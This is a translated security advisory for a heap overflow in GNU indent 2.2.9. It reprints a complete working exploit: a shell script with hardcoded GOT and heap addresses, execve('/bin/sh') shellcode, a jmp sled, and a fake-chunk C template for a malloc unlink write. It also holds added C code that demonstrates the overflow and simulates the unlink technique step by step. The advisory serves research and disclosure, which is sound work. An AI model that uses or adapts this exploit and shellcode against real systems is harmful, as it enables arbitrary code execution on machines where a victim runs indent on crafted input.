
Security Research

Security Vulnerability
GNU Indent Local Heap Overflow Vulnerability

Published: 2003-12-26
Updated: 2003-12-31

Affected systems:
GNU Indent 2.2.9
Description:
BUGTRAQ ID: 9297

GNU indent is a source code indentation tool, used mainly to reformat code written in C.

GNU indent does not perform sufficient bounds checking while copying data. A local attacker can exploit this to cause a heap-based overflow and may be able to execute arbitrary instructions on the system with the privileges of the indent process.

The vulnerability is triggered by supplying a malicious C source file as input. Because indent copies data from the file into a 1000-byte buffer without sufficient bounds checking, data adjacent to that buffer on the heap (including allocator metadata) can be overwritten; carefully constructed input may allow arbitrary instructions to be executed with the privileges of the indent process.
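As an added illustration (this is not indent's source code; the token-copy functions, the canary value and the input are constructed here), the unchecked copy pattern the advisory describes is shown beside a bounded version, with a witness that detects whether the bytes just past a 1000-byte heap buffer, where the allocator's chunk header and the next object would sit in the real program, are overwritten:

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 1000          /* fixed heap buffer size named in the advisory */
#define CANARY   0x5a5a5a5au   /* constructed marker placed right after the buffer */

/* Vulnerable pattern: copy a token up to newline/NUL, trusting the input length. */
static size_t copy_token_unchecked(char *dst, const char *src) {
    size_t n = 0;
    while (src[n] != '\0' && src[n] != '\n') { dst[n] = src[n]; n++; }
    dst[n] = '\0';
    return n;
}

/* Hardened version: never writes past cap bytes (NUL included);
   returns (size_t)-1 instead of overflowing so the caller can grow or reject. */
static size_t copy_token_bounded(char *dst, size_t cap, const char *src) {
    size_t n = 0;
    while (src[n] != '\0' && src[n] != '\n') {
        if (n + 1 >= cap) return (size_t)-1;
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Small wrapper so the bounded copy can be exercised on short inputs. */
static long bounded_copy_len(const char *src, size_t cap) {
    char tmp[64];
    if (cap > sizeof tmp) return -2;
    size_t r = copy_token_bounded(tmp, cap, src);
    return r == (size_t)-1 ? -1 : (long)r;
}

/* Returns 1 if the 4 bytes after the 1000-byte buffer were clobbered, 0 if intact.
   The region is allocated with slack so the witness itself is well-defined. */
static int overflow_witness(int use_bounded) {
    char *region = malloc(BUF_SIZE + 64);
    char *input  = malloc(BUF_SIZE + 32);
    if (!region || !input) { free(region); free(input); return -1; }
    memset(input, 'A', BUF_SIZE + 10);       /* constructed: 1010-byte token */
    input[BUF_SIZE + 10] = '\0';
    uint32_t canary = CANARY;
    memcpy(region + BUF_SIZE, &canary, sizeof canary);
    if (use_bounded) copy_token_bounded(region, BUF_SIZE, input);
    else             copy_token_unchecked(region, input);
    memcpy(&canary, region + BUF_SIZE, sizeof canary);
    int clobbered = canary != CANARY;
    free(input);
    free(region);
    return clobbered;
}
```

In indent's real layout the bytes after the buffer are a malloc chunk header and the next allocated structure, which is exactly what the test method below overwrites; the bounded copy refuses at byte 999 instead.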

<*Source: Winnie The Pooh Hacking Squadron*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Winnie The Pooh Hacking Squadron provided the following test method:

---------------------------prepare.sh----------------------------------
#!/bin/sh

# these addresses are working on indent 2.2.9 from
# slackware 9.0

# what_to_write
#
# it should be 2-byte aligned because it has to
# point to one of the \xeb bytes of the jmps. If it points
# to a \x08 - exploitation will fail
FD=`echo -e "\x40\xa4\x05\x08"`

# where_to_write-0x8
#
# it is good idea to point it to free() field in GOT
BK=`echo -e "\xc0\x7d\x05\x08"`

# change all 'JP' to \xeb\x08 (relative jmp to $+8 bytes)
sed -e "s/JP/`echo -e \"\xeb\x08\"`/g" winnie-template.c > temp.c

# change all 'N' to \x90 (NOP)
sed -e "s/NNNNNNNNNNNNNNN/`echo -e \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\"`/" temp.c > winnie.c

# change 'S's to shellcode
sed -e "s/SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS/`echo -e \"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\/bin\/sh\"`/" winnie.c > temp.c

# exploit with this shellcode is quite useless, because
# it is simple execve(shell) shellcode. If you want to
# change shellcode, first prepare winnie-template.c -
# change 'SSSS...' len to len of your new shellcode,
# but len of whole 'JP...NNN...SSS' should remain the same.
# You can remove few 'JP's. You have to leave few NOPs
# before shellcode, because one of jmp's will land in them
# (this is to be sure that no jmp will land in the middle
# of shellcode. When you changed template, change sed line
# above - change 'SSSS...' len and shellcode.


# change 'dddd' 'eeee' 'ffff' to 0xfffffffc (-4)
sed -e "s/dddd/`echo -e \"\xfc\xff\xff\xff\"`/" temp.c > winnie.c
sed -e "s/eeee/`echo -e \"\xfc\xff\xff\xff\"`/" winnie.c > temp.c
sed -e "s/ffff/`echo -e \"\xfc\xff\xff\xff\"`/" temp.c > winnie.c

# change 'gggg' to FD (what_to_write)
sed -e "s/gggg/$FD/" winnie.c > temp.c

# change 'hhhh' to BK (where_to_write-8)
sed -e "s/hhhh/$BK/" temp.c > winnie.c

# 'iiii' is prev_size, but we don't need to change it.
# Leave it untouched

# change 'jjjj' to 0xfffffff1 (size field, pointing to these
# three (-4))
sed -e "s/jjjj/`echo -e \"\xf1\xff\xff\xff\"`/" winnie.c > temp.c

# change 'llll' to some readable value (on stack for example)
# it is 'next' field of overwritten buf_break_list struct
sed -e "s/llll/`echo -e \"\x40\xff\xff\xbf\"`/" temp.c > winnie.c

rm temp.c

--------------------------prepare.sh------------------------------

--------------------------winnie-template.c---------------------

#include <stdio.h>

int main(int argc, char **argv)
{
    printf("W1nN13 Th3 p00H H4ck1n6 SqU4dr0n pR0udlY Pr3z3n7z:\n"
           "0-day P0f f0R indent-2.2.9 bUFF3r oV3rFl0W vU1n3r4b1l1ty\n");

  asm
        (
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "jmp continue\n"
        ".string \"JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJP
JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJ
PJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJP
JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJ
PJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJP
JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS\"\n"
        ".string \"cccddddeeeeffffgggghhhhiiiijjjjkkkkllll\"\n"
        "continue:\n"
        "nop\n"
        "nop\n"
        :);
  return 0;
}

-------------------------------winnie-template.c------------------------------
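The prepare.sh comments above describe a classic dlmalloc unlink attack: the overflow plants a fake chunk whose size field (-16) makes free() look 16 bytes *backwards* for the "next" chunk, that fake chunk has its in-use bit clear, and its fd/bk fields (gggg/hhhh) become the two pointers unlink() writes through, so free()'s GOT entry ends up pointing into the jmp sled. The following added example (it is neither the exploit authors' code nor glibc's) simulates that free() path over a flat 32-bit memory image laid out in the same placeholder order as winnie-template.c, and shows why what_to_write must land on an \xeb byte (the second unlink write clobbers 4 bytes at FD+12, which the jmp $+8 chain hops over) and why the safe-unlinking check in later glibc rejects the fake chunk. The addresses 0x200 (fake chunk), 0x400 (jmp sled) and 0x808 (free() GOT slot) are assumptions chosen for the simulation:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Flat 32-bit address space: offsets into mem[] stand in for addresses on the
   32-bit Linux target. All addresses and contents here are constructed. */
#define MEM_SIZE 0x1000
static uint8_t mem[MEM_SIZE];
static uint32_t rd32(uint32_t a) { uint32_t v; memcpy(&v, &mem[a], 4); return v; }
static void     wr32(uint32_t a, uint32_t v) { memcpy(&mem[a], &v, 4); }

/* dlmalloc (glibc 2.3-era) chunk layout: prev_size @0, size @4, fd @8, bk @12 */
enum { OFF_SIZE = 4, OFF_FD = 8, OFF_BK = 12, PREV_INUSE = 1, SIZE_BITS = 7 };
static uint32_t chunksize(uint32_t p) { return rd32(p + OFF_SIZE) & ~(uint32_t)SIZE_BITS; }
static int      prev_inuse(uint32_t p) { return rd32(p + OFF_SIZE) & PREV_INUSE; }

/* The unchecked unlink() macro of the time: two attacker-controlled 4-byte writes. */
static void unlink_chunk(uint32_t p) {
    uint32_t fd = rd32(p + OFF_FD), bk = rd32(p + OFF_BK);
    wr32(fd + OFF_BK, bk);   /* FD->bk = BK : clobbers 4 bytes inside the jmp sled */
    wr32(bk + OFF_FD, fd);   /* BK->fd = FD : writes what_to_write at where_to_write */
}

/* Safe-unlinking check added to later glibc; fails on the fake chunk. */
static int safe_unlink_ok(uint32_t p) {
    uint32_t fd = rd32(p + OFF_FD), bk = rd32(p + OFF_BK);
    return rd32(fd + OFF_BK) == p && rd32(bk + OFF_FD) == p;
}

/* Forward-consolidation step of free(p): if the chunk after p is free, unlink it. */
static int free_forward_consolidate(uint32_t p) {
    uint32_t next = p + chunksize(p);      /* size -16 => "next" lies 16 bytes before p */
    uint32_t nextsize = chunksize(next);   /* -4 masks to -8 */
    if (!prev_inuse(next + nextsize)) {    /* reads dddd: bit 0 clear => "free" */
        unlink_chunk(next);
        return 1;
    }
    return 0;
}

/* Lay out the placeholders of winnie-template.c in prepare.sh's order:
   ccc dddd eeee ffff gggg hhhh iiii jjjj kkkk llll. Returns the chunk pointer
   whose header is iiii/jjjj. 'base' is an assumed heap address. */
static uint32_t build_fake_chunk(uint32_t base, uint32_t what, uint32_t where) {
    const uint32_t neg4 = 0xfffffffc;
    memcpy(&mem[base], "ccc", 3);
    wr32(base + 3,  neg4);         /* dddd: size field whose PREV_INUSE bit free() tests */
    wr32(base + 7,  neg4);         /* eeee: fake next chunk prev_size */
    wr32(base + 11, neg4);         /* ffff: fake next chunk size */
    wr32(base + 15, what);         /* gggg: fd = what_to_write */
    wr32(base + 19, where - 8);    /* hhhh: bk = where_to_write - 8 */
    wr32(base + 23, 0);            /* iiii: prev_size, untouched */
    wr32(base + 27, 0xfffffff1);   /* jjjj: size = -15 -> chunksize -16, PREV_INUSE set */
    wr32(base + 31, 0);            /* kkkk */
    wr32(base + 35, 0xbfffff40);   /* llll: buf_break_list 'next', any readable address */
    return base + 23;
}

/* Follow a chain of "eb 08" jumps from pc for up to 'hops' steps; stop on anything else.
   Reports whether any hop landed inside [lo, hi), the bytes unlink() clobbered. */
static uint32_t follow_jmps(uint32_t pc, int hops, uint32_t lo, uint32_t hi, int *in_hole) {
    *in_hole = 0;
    for (int i = 0; i < hops && mem[pc] == 0xeb; i++) {
        pc = pc + 2 + (int8_t)mem[pc + 1];
        if (pc >= lo && pc < hi) *in_hole = 1;
    }
    return pc;
}

struct result { int unlinked, safe_check, in_hole; uint32_t got_free, hole, pc; };

/* what_to_write: the address free() gets redirected to (should be an \xeb byte). */
static struct result run_unlink_exploit(uint32_t what_to_write) {
    const uint32_t sled = 0x400, got_free = 0x808;   /* assumed addresses */
    struct result r;
    memset(mem, 0, sizeof mem);
    for (uint32_t a = sled; a < sled + 64; a += 2) { mem[a] = 0xeb; mem[a + 1] = 0x08; }
    wr32(got_free, 0x12345678);                      /* stands in for the real free() GOT entry */
    uint32_t p = build_fake_chunk(0x200, what_to_write, got_free);
    r.safe_check = safe_unlink_ok(p + chunksize(p));
    r.unlinked   = free_forward_consolidate(p);
    r.got_free   = rd32(got_free);                   /* now what_to_write */
    r.hole       = rd32(sled + 12);                  /* where FD->bk = BK landed */
    r.pc = follow_jmps(what_to_write, 5, sled + 12, sled + 16, &r.in_hole);
    return r;
}

int main(void) {
    struct result r = run_unlink_exploit(0x400);
    printf("safe-unlink check: %s\n", r.safe_check ? "pass" : "FAIL (later glibc aborts here)");
    printf("GOT free() = 0x%08x, bytes at sled+12 = 0x%08x\n", r.got_free, r.hole);
    printf("pc after 5 jmps = 0x%04x, landed in clobbered bytes: %d\n", r.pc, r.in_hole);
    return 0;
}
```

Build with `cc -std=c99 -o unlink_sim unlink_sim.c`. Passing 0x401 instead of 0x400 reproduces the failure mode noted in prepare.sh: the first byte at the redirected address is \x08, not a jmp, so the chain never starts. The two writes also explain the 2-byte alignment requirement: FD+12 is overwritten with BK, and the sled survives only because every jmp skips 8 bytes ahead.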

Recommendations:
Vendor patch:

GNU
---
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.gnu.org/software/indent/

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.